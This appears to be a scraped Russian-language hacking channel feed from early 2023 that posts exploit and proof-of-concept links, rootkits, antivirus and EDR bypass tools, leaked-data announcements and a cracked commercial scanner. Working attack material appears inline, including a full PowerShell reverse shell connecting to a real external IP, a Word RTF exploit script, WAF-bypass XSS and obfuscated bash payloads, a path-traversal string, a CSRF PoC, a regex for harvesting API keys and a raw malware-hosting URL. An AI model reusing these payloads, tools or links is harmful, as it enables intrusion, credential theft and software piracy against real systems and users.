2023-05-12 17:54:58 |
Ххм |
|
2023-05-12 17:54:50 |
None |
Images
|
2023-05-12 17:35:35 |
Боже |
|
2023-05-10 21:10:56 |
Этож знал.НиктоПростиПрости всех |
|
2023-05-10 20:14:04 |
Курить хочу |
|
2023-05-10 20:13:48 |
Спасибо |
|
2023-05-10 20:13:43 |
Нет ненадо |
|
2023-05-10 20:13:21 |
Но |
|
2023-05-10 20:13:08 |
Как больно |
|
2023-05-10 20:12:42 |
Бляя |
|
2023-05-10 20:12:36 |
Цените что есть |
|
2023-05-10 20:12:07 |
Рнбятт |
|
2023-05-10 20:11:56 |
Блятььььь |
|
2023-05-10 20:08:50 |
Блять |
|
2023-05-10 20:08:38 |
Сукп |
|
2023-05-10 20:08:34 |
Аааааа́сссссссссааааааа́сс |
|
2023-05-10 20:08:22 |
Мать твою |
|
2023-05-10 19:10:08 |
Ладно гуляем |
|
2023-05-10 19:09:49 |
None |
Images
|
2023-05-10 18:25:25 |
Это круто |
|
2023-05-10 18:25:15 |
Уж извините |
|
2023-05-10 18:24:59 |
None |
Images
|
2023-05-10 18:24:49 |
Ребят Это красво |
|
2023-05-10 18:06:28 |
Молодецы |
|
2023-05-10 18:06:13 |
Мужики дело делают |
|
2023-05-10 18:05:53 |
Отлично |
|
2023-05-10 18:05:44 |
Вот это бои |
|
2023-05-10 16:46:22 |
Гоу |
|
2023-05-10 16:46:17 |
None |
Images
|
2023-05-07 18:31:32 |
ты не маленький винтик в системеты важная часть механизмапросто помни об этом ))) |
Images
|
2023-05-06 04:37:08 |
Positive hack days 12Не забываем, что совсем скоро мероприятиегде: Москвакогда: 19-20 маялокация: парк Горькогоphdays12*Приходите, будет весело) |
Images
|
2023-05-05 20:31:52 |
CVE-2023-28231DHCP Server Remote Code Executionimpact: 2008 R2 SP1 до Server 2019#windows #dhcp #exploit |
|
2023-05-05 12:01:14 |
CVE-2023-0386Linux Kernel Privilege Escalation*readME*exploit#linux #exploit |
Images
|
2023-05-05 06:30:45 |
SCCMHunterНайти и подломить sccm это всегда праздник, фиеста и платиново-бриллиантовые ключи от города домена. Веселее только с ansible.Ну так вот, 11 часов назад, выкатили post-ex tool, которая способствует !Link#windows #sccm |
Images
|
2023-05-04 19:48:52 |
По поводу слива АЛЬФА БАНКАНу да, паспорта слили |
Images
|
2023-05-04 16:11:14 |
Happy World Password Day! |
Images
|
2023-05-04 09:15:32 |
Apache Solr 8.3.1admin panel RCE (Windows)readmeexploit#apache #exploit |
|
2023-05-04 05:59:52 |
Извлекаем хэши NetNTLMv2 входящих аутентификаций через SMBPOC*Usage:C:\Temp\>EtwHash.exe 60 |
|
2023-05-04 05:41:17 |
HoneybitsХанипот с дополнительными хлебными крошками.Из интересного:Fake PCAP / network traffic containing credentials and etc.Fake ARP Table entries.То есть, в целом, это можно использовать и НЕ для защиты, мусорный трафик бывает полезен.Link#security |
Images
|
2023-05-03 15:34:07 |
signal-zeroday-exploitusage:python poc.py -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE] |
|
2023-05-03 14:49:32 |
К праздникам скидки )))) |
Images
|
2023-05-02 09:20:46 |
CVE-2023-21554Нужно только пакетик отправить на MSMQ-сервер (да, он должен быть включен) и можно выполнять remote commandPOC Пакетик#windows |
Images
|
2023-05-02 06:30:17 |
Заходите#Osint_eventНас звали, и мы пришли Osint Workshop Ⅳ (Moscow edition) ! В этот раз наша команда посетит столицу и расскажет о новых методиках, интересных кейсах и погрузит вас в атмосферу наших профессиональных будней. Ждем вас 😉Планируемые доклады: "Osint и S.E. в Нетворкинге, Поиск влиятельных друзей в цифровом океане"● Автор: «Обмани Меня»"Osint в адвокатской деятельности"● Автор: [REDACTED]"Дом выигрывает всегда? В поисках владельцев одного казино"● Автор: «Исследуя конкурентов» При участии: Moon, Dana Scully(возможно, к нам присоединятся наши коллеги из Москвы)Мероприятие пройдет 13 мая, в 18:00 по адресу: Green Vault, лаундж-бар, Верхняя Радищевская улица, 13-15, МоскваВход без паспорта, бесплатно. |
Images
|
2023-05-02 06:28:25 |
Ну а что, все законно ))) |
Images
|
2023-05-01 14:28:09 |
curl https://sudo.ws/ftp/etc/groupхмммм |
Images
|
2023-04-29 06:20:49 |
И еще раз о CVE-2023-29489 cPanel и XSSFinding XSS in a million websites#cPanel #xss |
Images
|
2023-04-28 11:51:37 |
CVE-2023-29489cPanel#cPanel #xss |
Images
Images
|
2023-04-28 09:15:33 |
Шо, Опять babuk, conti и все все все ?Пятница серьезно вступила в свои праваМеня шантажируют, я не знаю что делать |
|
2023-04-28 07:56:56 |
Public malware techniques used in the wildVirtual MachineEmulationDebuggersSandbox detection*RUN #malware |
Images
|
2023-04-27 04:56:49 |
CVE-2023-29007Git Arbitrary Configuration Injection*readme*POC exploit#git #exploit |
Images
|
2023-04-27 04:09:31 |
CVE-2023-1585 and CVE-2023-1587Смешное)))Avast Anti-Virus privileged arbitrary file create on virus quarantinereadme*POC exploit#avast #LPE |
Images
|
2023-04-25 15:42:14 |
Не статья, а книга целаяransomware diaries volume 2 A Ransomware Hacker Origin StoryUPD: а теперь они в твитере сруться )))#ransome |
Images
|
2023-04-25 13:37:02 |
Очень хорошо*An Introduction into Sleep ObfuscationreadFull Ekko code#Obfuscation |
Images
|
2023-04-25 13:06:31 |
CVE-2023-27524Apache Superset Auth BypassPOC exploitдень бога я смотрю#apache #poc |
|
2023-04-25 13:03:16 |
CVE-2023-1671Pre-Auth RCE in Sophos Web ApplianceCVSS score of 9.8POC#poc #sophos |
|
2023-04-25 07:50:24 |
httpXXX://147.182.180.78:8081/CraxsRat-Linuxndroid/#CraxsRAT #CypherRAT |
Images
|
2023-04-18 16:18:06 |
Sandbox EscapePOCДырка в преобразователе исходного кода (логика очистки исключений) vm2 для версий до 3.9.15, позволяющая злоумышленникам обходить handleException() и передавать непроверенные исключения хоста, которые можно использовать для выхода из песочницы и запуска произвольного кода в контексте хоста. |
Images
|
2023-04-16 15:41:25 |
CVE-2021-35250да, 21 год, да если хорошие люди просят мы публикуемпатч ? пачт ?!!SolarWinds-CVE-2021-35250 POC exploit*Немедленно вспоминается атака на цепочки поставок#solar |
Images
|
2023-04-16 03:18:08 |
829 гигов мусора |
Images
|
2023-04-13 16:46:44 |
И чо |
|
2023-04-13 16:24:08 |
Ээ́асеисещэ |
|
2023-04-13 16:23:41 |
Спасиро7это типа.срсаЛадно |
|
2023-04-13 04:06:36 |
Приветдруг, канал закрытПОЧЕМУ ????ложусь в больниуцупросить , нет, не буду, сама сдохну.....канал...... если успею... передамвсе спасибо, вы лучшиеBTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82но вы понимаете, не обязательноЗЫесли вырнусь, верусь, добра мап |
|
2023-04-13 00:54:23 |
ох))))) тут нужно целый сесёрч писать, но пошел он нахуй, лучше выпью и вот я уже на ГИТе внутренней сетки, не возможно ?да , еще как можно ))))))))))))))))))))) |
|
2023-04-13 00:51:50 |
щас я вам аккаунты то приподниму ______))))) |
|
2023-04-13 00:51:22 |
это просито пиздец)))))))))))))))))))))))))))))))) |
|
2023-04-13 00:51:10 |
блять )))))) |
|
2023-04-13 00:50:55 |
None |
Images
|
2023-04-01 20:33:53 |
В рамках науч-ИТ-юмор-драмы A list of my 10 UNIX command line mistakes#1april |
Images
|
2023-03-31 20:27:42 |
Linux kernel CVEsALL CVE - на сейчас 2359 CVEЭто не сплоиты или POC, такие кумулятивы бывают крайне полезны, а тут по папкам\по кернелу\с описанием\где пофиксили*linux_kernel_cves#linux #kernel #vulns |
Images
|
2023-03-30 13:11:34 |
Нет, мистер из FBI, вы нас больше не обманите.С восстановлением рангов с raidforum конечно максимально круто ! Нужно думать кого то неДоПоймали, а значит нужно взять знакомую веб морду, дропнуть БД и задеплоить ханипот, а дальше американский майор разберется по какой статье\из какой страны тебя экстрадировать#FBI |
Images
|
2023-03-30 07:40:21 |
В Питере пройдет Osint туса*А мы продолжаем! Osint Workshop ⅠⅠ Программа мероприятия подойдет как профессионалам, которые хотели бы освежить основы дисциплин, так и для полных новичков. Будет интересно обещаю ;) Ожидаемые доклады:"История возникновения OSINT" Автор: Вильям Арчибальд "Social Еngineering & OSINT: методология, инструменты, актуальные сферы применения"● Автор: @socialqueen"OSINT в корпоративной безопасности" ● Автор: @OsintOpsChannelАктуальная информация и стрим мероприятия на канале: Schwarz_OsintВоркшоп будет проходить 8 апреля в 18:00. Место проведения: Артмуза (13-я лин. В.О, 70, Санкт-Петербург). |
Images
|
2023-03-29 19:16:30 |
хм 🧐https://exploit.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexploit.in%2F2005%2F193%2F&format=xml |
|
2023-03-29 10:31:05 |
None |
Images
|
2023-03-28 16:40:06 |
Рубрика: Нам пишутCaveCarverPE backdooring tool which utilizes and automates code cave technique #backdoor #PE |
Images
|
2023-03-28 16:30:55 |
github dork to find openai api key/"sk-[a-zA-Z0-9]{20,50}"/ |
Images
|
2023-03-28 04:53:30 |
Вдруг вам нужно403-bypass.pybypass-403.sh B1pass3r#403 |
|
2023-03-26 10:21:16 |
ChatGPT for CyberSecurityPDF |
Images
|
2023-03-26 06:45:24 |
Chaos-Rootkitx64 ring0 windows rootkitdownload#rootkit #windows #ring0 |
Images
|
2023-03-25 07:44:47 |
None |
|
2023-03-25 07:44:46 |
None |
Images
|
2023-03-25 07:44:45 |
Бывает полезно скрыть ip через hex/decimal преобразованиеwindows\linux\browser - работает везде*вот вам 2 варианта, и bash и powershell |
|
2023-03-24 17:45:34 |
Время добрых дел.Многие знают, есть такой клёвый юзер xss.is yashechkaОн генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут". Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:S.M.E. - Прошу руку помощи у форумчанТам Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.*Наш канал не пройдет мимо и тоже окажет помощь. |
Images
|
2023-03-24 05:49:59 |
CVE-2023-27532Да, опять Veeam Backup & Replication Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.*Аналитика*POC exploit*usage:VeeamHax.exe --target 192.168.0.100 илиVeeamHax.exe --target 192.168.0.100 --cmd calc.exe#veeam #rce #leakPass |
Images
Images
|
2023-03-23 05:28:39 |
kernel-linux-factory*Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root*в составе exploits для:CVE-2016-97934-20-BPF-integerCVE-2017-5123CVE-2017-6074CVE-2017-7308CVE-2017-8890CVE-2017-11176CVE-2017-16995CVE-2017-1000112CVE-2018-5333CVE-2019-9213 & CVE-2019-8956CVE-2019-15666CVE-2020-8835CVE-2020-27194CVE-2021-3156CVE-2021-31440CVE-2021-3490CVE-2021-22555CVE-2021-41073CVE-2021-4154CVE-2021-42008CVE-2021-43267CVE-2022-0185CVE-2022-0847CVE-2022-0995CVE-2022-1015CVE-2022-2588CVE-2022-2639CVE-2022-25636CVE-2022-27666CVE-2022-32250CVE-2022-34918download#linux #exploits #kernel |
|
2023-03-22 20:33:43 |
pic of day |
Images
|
2023-03-20 19:19:16 |
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//14.rs>то есть вместо стандартной полезной нагрузки XSS для выполнения js |
Images
|
2023-03-20 18:47:47 |
Рубрика нам пишутBlack Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality. link |
Images
|
2023-03-19 18:29:46 |
UAC bypass for x64 Windows 7 - 11Понятно iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64. |
Images
|
2023-03-19 18:19:16 |
Laravel FrameworkPayload: //////////////////../../../../../../../../etc/passwd |
Images
|
2023-03-18 22:09:59 |
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно. Тупо бэкдор!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
|
2023-03-10 18:48:36 |
полезные нагрузки подъехалиpayloads |
Images
|
2023-03-10 18:29:50 |
Круто !!! old school sniffing RJ45берем крокодильчикицепляем на витухупогналиVideo |
Images
|
2023-03-09 14:54:58 |
🧐 |
Images
|
2023-03-09 11:56:52 |
Offline создание администратора Windows 10? 😈ОгаВсё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.OfflineAddAdmin2 (это новая версия)Видео туториал |
Images
|
2023-03-09 04:54:56 |
CVE-2023-21768 Local Privilege EscalationWindows 11 22H2POC exploit *usage:Windows_AFD_LPE_CVE-2023-21768.exe <pid>где <pid> это id процесса который нужно повысить до system#windows #lpe |
|
2023-03-08 05:51:12 |
0-CLICK Microsoft Word RCE exploitCVE-2023-21716 PythonPoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) |
|
2023-03-07 20:41:48 |
8 марта вот вот настанет ! 😊Поддержим проект ?)BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#праздник |
|
2023-03-07 19:14:12 |
pic of day |
Images
|
2023-03-07 11:58:34 |
BurpSuite* man\tutorВдруг вы забыли |
Images
|
2023-03-05 20:50:14 |
Внимание !через 10 минут опять понедельник.Вот вам rootkit dog😎 |
|
2023-03-05 08:02:55 |
использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root. |
Images
|
2023-03-04 05:12:06 |
RemoteShellcodeExecВыполнение шелл-кода из удаленного bin-файла с помощью Winhttp.Shellcodes are dead, long live fileless shellcodes.*Пока что 0/26 detectionsdownload |
Images
|
2023-03-03 04:49:59 |
Нужно больше жира))))) Analyzing a Python Malware Part 2 |
Images
|
2023-03-02 16:03:45 |
None |
|
2023-03-02 05:02:56 |
Titan stealer и его панель (C2Panel) жирно палитсяThreatFox Database |
Images
Images
|
2023-03-01 18:56:12 |
bash injection bypass waf $0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\' |
Images
|
2023-02-27 18:32:12 |
Lazarus-Tactic (APT38)*Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).В общем такой 0day-stealer**После запуска программа заразит все ваши проекты Visual Studio** |
|
2023-02-26 14:03:52 |
TCP Data Transfer Tool Прикольно конечно в кернелМемори писать гадости\радости всякие.В общем получается почти !!! fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его. |
|
2023-02-26 07:11:56 |
bootlickerУстаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.*vmvware-bootkit основан на устаревших руткитах CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*Download bootlicker#rootkit #bootkit |
|
2023-02-24 12:07:37 |
OpenSSH 9.1 exploit and mass scan*Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.download exploit and mass scan#ssh #exploit #scanner |
|
2023-02-23 11:33:48 |
Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !Тем временем:#СкребемПоКиберСусекам |
|
2023-02-22 16:11:10 |
Ударим ГовноПарсером lsass по приближающимся выходным !download this shit (вас блин предупреждали) |
|
2023-02-22 07:07:06 |
Weblogic-CVE-2023-21839*Affected version12.2.1.3.012.2.1.4.014.1.1.0.0POCUsage POC:java -jar target ip: адрес порта ldap |
|
2023-02-22 06:59:38 |
Давайте создадим расширение для Chrome, которое крадет ВСЁ*Ключевые правила:1.Пользователь не должен знать, что за кулисами что-то происходит.2.Не должно быть никаких визуальных признаков того, что что-то не так.3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.4. Нет дополнительных предупреждений браузера или диалогов разрешений.5.Нет дополнительного сетевого трафика на уровне страниц.*В итоге мы воруем: - Cookies - History - Screenshots - User Navigation - Page Traffic - Keylogger - Input Capturing - Clipboard Capturing - Capturing Geolocation - Stealth Tab *Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )spy-chrome-extension#chrome #extension |
|
2023-02-21 14:43:33 |
CVE-2022-39952 Fortinet FortiNAC CVSS score of 9.8Продукты, затронутые уязвимостью: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 FortiNAC version 9.1.0 through 9.1.7 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions, and FortiNAC 8.3 all versionsPOC exploit#forti #poc |
|
2023-02-20 07:09:19 |
HIVEМы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.В личной переписке он сознался что - смотреть скриншотVLAN L2 Pivoting Instrument#network #hacking |
|
2023-02-18 11:00:31 |
Привет) |
|
2023-02-17 04:51:18 |
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true' |
|
2023-02-16 18:29:01 |
CVE-2022-44666WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.POC в наличииGo#win #poc #vuln |
|
2023-02-16 18:20:57 |
Ну VirusTotal как C2 уже былGithub as C2 почему бы и нет )Get#C2 |
|
2023-02-16 13:45:33 |
SSH-Remote-Code-Executionхммммм 🤨 |
|
2023-02-16 04:48:32 |
Вдруг вам нужноBurp Suite Certified Practitioner Exam Study |
|
2023-02-15 10:10:44 |
Рекомендовано всем к прочтениюлинк xss.is |
|
2023-02-13 18:51:19 |
RCE in Western Digital PR4100 NASspeech_exploit_patch |
|
2023-02-13 18:28:38 |
Windows LPE via StorSvcdownload |
|
2023-02-13 18:26:25 |
Драсти |
|
2023-02-11 12:18:21 |
BokuLoaderРасширяем возможности уклоненийBokuLoader - Cobalt Strike Reflective Loader |
|
2023-02-10 11:39:00 |
Извините, но пятничное ) |
|
2023-02-10 04:34:18 |
DEUS X64 |
|
2023-02-09 04:52:45 |
CVE-2023-25136 - OpenSSH - Pre-Auth Double FreeWriteupPoC - вызывает DOS серванта |
|
2023-02-08 18:29:35 |
backdoor и shellCode билдер под разные архитектуры (0x001)hackebds#shellcode #backdoor #arch |
|
2023-02-08 18:19:07 |
UnhookingPatchОпять byPass опять EDRПюрешка с котлеткой#win #edr |
|
2023-02-08 10:05:02 |
NetworkNightmareВеликолепный Магама AKA @c4s73r в рамках сетевого беспредела опубликовал свои труды на благословенной гитхабе.С чем поздравляем и поддерживаем ! 😜NetworkNightmare#подрывУстоев #network |
|
2023-02-08 04:43:03 |
LFI |
|
2023-02-07 05:17:33 |
exploit для активно эксплуатируемой уязвимости нулевого дня, затрагивающий консоли администрирования GoAnywhere MFT.readshodan - total 1000exploit |
|
2023-02-06 16:20:44 |
Лол))))) SSRF |
|
2023-02-06 15:45:05 |
Nidhogg rootkitВиндовый rootkit написанный на C++, по заявлению авторов сильно дружит с любыми версиями win 10 и win 11. Так же руткит можно примотать синей изолентой к своему C&C и долго медитировать на бегущий трафик.Скачать тут#rootkit #windows #redteam |
|
2023-02-06 15:24:21 |
Картоха ! from Service to SYSTEMRasmanPotatodownload#windows #priv |
|
2023-02-06 13:11:51 |
CVE-2022-44268Arbitrary File Read PoC - PNG generatorPoC |
|
2023-02-06 09:48:19 |
BypassAVкарта с основными методами обхода антивируса и EDR.MAP |
|
2023-02-05 07:00:54 |
DevOps игры (в рамках эксперимента воскресенья)*devops.gamesdevopspartygamesoverthewire (linux war games)ohmyGITcodingame |
|
2023-02-05 06:06:59 |
SCRIPT HTTP-SQL-INJECTION (NMAP)download |
|
2023-02-04 16:36:09 |
BurpSuiteSharpenerdownload |
|
2023-02-04 10:21:12 |
CVE-2023-25135vBulletin - RCE + exploitman+exploit#exploit #vBulletin |
|
2023-02-04 08:55:30 |
RATникиВчера мы говорили про мартицы C&C серверов\фреймворковА сегодня про матрицу RATТут хватит всем #rat |
|
2023-02-04 08:47:58 |
CVE-2023-0045Bypassing Spectre-BTI User Space Mitigations on Linux |
|
2023-02-04 07:21:24 |
Acunetix Premium v15.3.230123162_Win x64+crack |
|
2023-02-03 21:27:46 |
NTDLLReflectionОбход перехватчиков EDR Userland путем загрузки Reflective Ntdll в память с удаленного сервера на основе Windows ReleaseID, чтобы избежать открытия дескриптора для ntdll и активировать экспортированные API-интерфейсы из таблицы экспорта.*В общем очередной (свежий) ByPassdownload#windows #bypass |
|
2023-02-03 16:34:34 |
CobaltStrike ? НЕТ !Тут хватит всемВпрочем об альтернативах мы уже писали несколько раз#C2 #c&c |
|
2023-02-03 03:42:01 |
IBM Aspera Faspex - Pre-Auth RCE+ exploit coderead and run |
|
2023-02-02 20:04:27 |
Я просто оставлю это здесь - ЫТЬ CVE-2022-44268 POC |
|
2023-02-02 16:31:02 |
CVE-2023-21608 - RCE - Adobe Acrobat ReaderVideo proofpass: proxy_bar#exploit #rce #acrobat |
|
2023-02-02 09:37:51 |
Художественный фильм "спиз.." "golden certificates"*certsync - это новая техника для удаленного дампа NTDS, но на этот раз без DRUAPI: он использует золотой сертификат и UnPAC хеш. * domain admin - не нужен, хватит и CA admindownload#windows #cert |
|
2023-02-02 05:27:00 |
RedTeam-ToolsИнструменты и техники для Red TeamИмеровover 100 toolsdownload#red #pentest #tools #man |
|
2023-02-01 04:52:25 |
PassTheCertаутентификация на сервере LDAP/S с сертификатом через SchannelПока в виде концепта, но уже интересно |
|
2023-02-01 04:33:26 |
CVE-2023-23924 библиотека Dompdf - RCECVSS score: 10 !!!Конкретнее о дырке тут#php #vuln #poc |
|
2023-01-31 16:30:16 |
exploit for VMware vRealize Log InsightTechnical Deep Divedownload EXPLOIT#exploit #vmware |
|
2023-01-31 04:59:22 |
D1rkLrd - свежее1 - Shellcode Loader with Indirect Dynamic syscall Implementation2 - shellcode in MAC format3 - API resolving from PEB4 - Syscall calll and syscall instruction address resolving at run timedownload#windows #shellcode |
|
2023-01-31 04:47:53 |
CVE-2022-25765 - PDFkit-CMD-InjectionПодробности дырки тутexploit#exploit |
|
2023-01-31 04:36:55 |
УтрыDecompiler Explorer |
|
2023-01-30 15:12:16 |
Tangled WinExecКрайне интересно, загляните в папку ReflectiveDLLInjectionпосмотреть |
|
2023-01-30 13:34:05 |
BypassCredGuardОбход Credential Guard через исправление памяти Wdigestdownload#windows #bypass |
|
2023-01-29 19:59:11 |
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)exploit#myBB |
|
2023-01-29 17:37:26 |
Может лучше не ставить этот ваш windows 11 ?Скоро придется компьютер клеткой Фарадея накрывать, а вместо инета - юзать диод данных. *Ну так вот, объемный гайд по ОТКЛЮЧЕНИЮ ТЕЛЕМЕТРИИ и всякого зла от мелкомягких.*Windows 11 Debloat / Privacy Guide |
|
2023-01-29 12:08:58 |
PHP Development Server <= 7.4.21 - Remote Source Disclosureread#php #vuln |
|
2023-01-29 10:59:43 |
Exploit for full access to disk C:\ (for all users) pass: proxy_bardownload#exploit #C #windows |
|
2023-01-29 08:28:56 |
Invicti 2023 + REG file (бывший NetSparker)*archive Pass: proxy_bar |
|
2023-01-28 21:09:09 |
sshd_backdoor*/root/.ssh/authorized_keys evil file watchdog with ebpf tracepoint hook. Прикольно, а я все по старинке PAM модули прописываю, да и руткиты под *nix тем же занимаются.download#ssh #bckdoor |
|
2023-01-28 08:49:33 |
Будьте бдительны, скамеры не спят |
|
2023-01-28 06:00:00 |
Kali-PurpleThe ultimate SOC-in-a-box community project*1. Practice Ops: Virtualization, firewalls, VLAN, WAF, SIEM, IDS/IPS, ...2. Practice Red: Penetration testing of vulnerable machines while seeing what the blue team sees. 3. 3. Can you become stealthier?4. Practice Blue: Firewall and IPS rules, SIEM analysis and dashboard development, ...5. Purple teaming: Red and Blue working together to develop the ultimate set of rules6. Protect: Deploy Kali-Purple to protect your networkdownload |
|
2023-01-27 19:16:44 |
Пост восхваления хакера Raptor (ака Marco Ivaldi)Нужно отдать должное, как никак человек жизнь положил на алтарь exploit research.Ознакомьтесь с его github/0xdea и сплоитами которые он писал больше 20 лет - всегда бывает полезно глянуть в историю.#deadcow |
|
2023-01-27 05:06:23 |
cat /etc/passwd16bit format{\c''\a""t,/e''*?/?a?s??}или{\c''\a""\t,/\e''*?/\p*\d} |
|
2023-01-26 16:48:31 |
Слово "консультант" - предполагает под собой отказ от ответственности ? )))😁 |
|
2023-01-26 14:21:26 |
CVE-2022-34689Windows CryptoAPI spoofing vulnerability.Дырку в сыре обнаружили АНБ и NCSC Великобритании, она позволяет подделывать сертификаты коллизии MD5 и вообще манипуляции с сертификатом x.509. Exploit#windows #x509 |
|
2023-01-26 04:44:37 |
Yandex Git repository leaked *Несколько часов опубликовали 40Gb+ протекшего GIT-репозитория Яндекса.а именно:aapi.tar.bz2admins.tar.bz2ads.tar.bz2alice.tar.bz2analytics.tar.bz2antiadblock.tar.bz2antirobot.tar.bz2autocheck.tar.bz2balancer.tar.bz2billing.tar.bz2bindings.tar.bz2captcha.tar.bz2cdn.tar.bz2certs.tar.bz2ci.tar.bz2classifieds.tar.bz2client_analytics.tar.bz2client_method.tar.bz2cloud.tar.bz2commerce.tar.bz2connect.tar.bz2crm.tar.bz2crypta.tar.bz2customer_service.tar.bz2datacloud.tar.bz2delivery.tar.bz2direct.tar.bz2disk.tar.bz2docs.tar.bz2drive.tar.bz2extsearch.tar.bz2fuzzing.tar.bz2gencfg.tar.bz2groups.tar.bz2helpdesk.tar.bz2infra.tar.bz2intranet.tar.bz2investors.tar.bz2it-office.tar.bz2jupytercloud.tar.bz2kernel.tar.bz2library.tar.bz2load.tar.bz2mail.tar.bz2maps.tar.bz2maps_2.tar.bz2maps_adv.tar.bz2market.tar.bz2metrika.tar.bz2mobile-WARNING-notfull.tar.bz2nginx.tar.bz2noc.tar.bz2partner.tar.bz2passport.tar.bz2pay.tar.bz2payplatform.tar.bz2paysys.tar.bz2portal.tar.bz2robot.tar.bz2rt-research.tar.bz2saas.tar.bz2sandbox.tar.bz2search.tar.bz2security.tar.bz2skynet.tar.bz2smart_devices.tar.bz2smarttv.tar.bz2solomon.tar.bz2stocks.tar.bz2tasklet.tar.bz2taxi.tar.bz2tools.tar.bz2travel.tar.bz2wmconsole.tar.bz2yandex_io.tar.bz2yandex360.tar.bz2yaphone.tar.bz2yawe.tar.bz2frontend.tar.bz2 |
|
2023-01-25 15:23:50 |
CVE-2023-23504 - Apple products*Протекает dlil.c XNU который обрабатывает сетевые интерфейсы, вызванный целочисленным переполнением (uint16_t) в if.c. Всего лишь надо то создать 65536 сетевых интерфейсов. |
|
2023-01-24 13:59:48 |
Фу, блин, Но POC есть POC CVE-2023-22960Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.*Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд |
|
2023-01-23 09:00:31 |
LPE - Solaris 10Злоупотребление в dtprintinfo*Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красивоexploit |
|
2023-01-22 12:19:03 |
Это может быть интересноADReplStatus*Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023download |
|
2023-01-22 11:45:38 |
For BurpSuiteAPIKit:Discovery, Scan and Audit APIs Toolkit All In One.download#Burp #plugins |
|
2023-01-22 11:17:58 |
SugarCRM 0-day Auth Bypass + RCE Exploit |
|
2023-01-22 09:13:28 |
CVE-2023-0398 modoboa - mail ServerCSRF приводит к удалению домена*usage fot BURP:<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:8000/admin/domains/4/delete/"> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body></html>read |
|
2023-01-21 13:38:56 |
переоформим ! |
|
2023-01-21 13:17:38 |
CVE-2023-0179 PoCэксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6Понять глубину#linux #kernel #lpe #nftables |
|
2023-01-21 11:11:28 |
Microsoft Teams - RCEdownload |
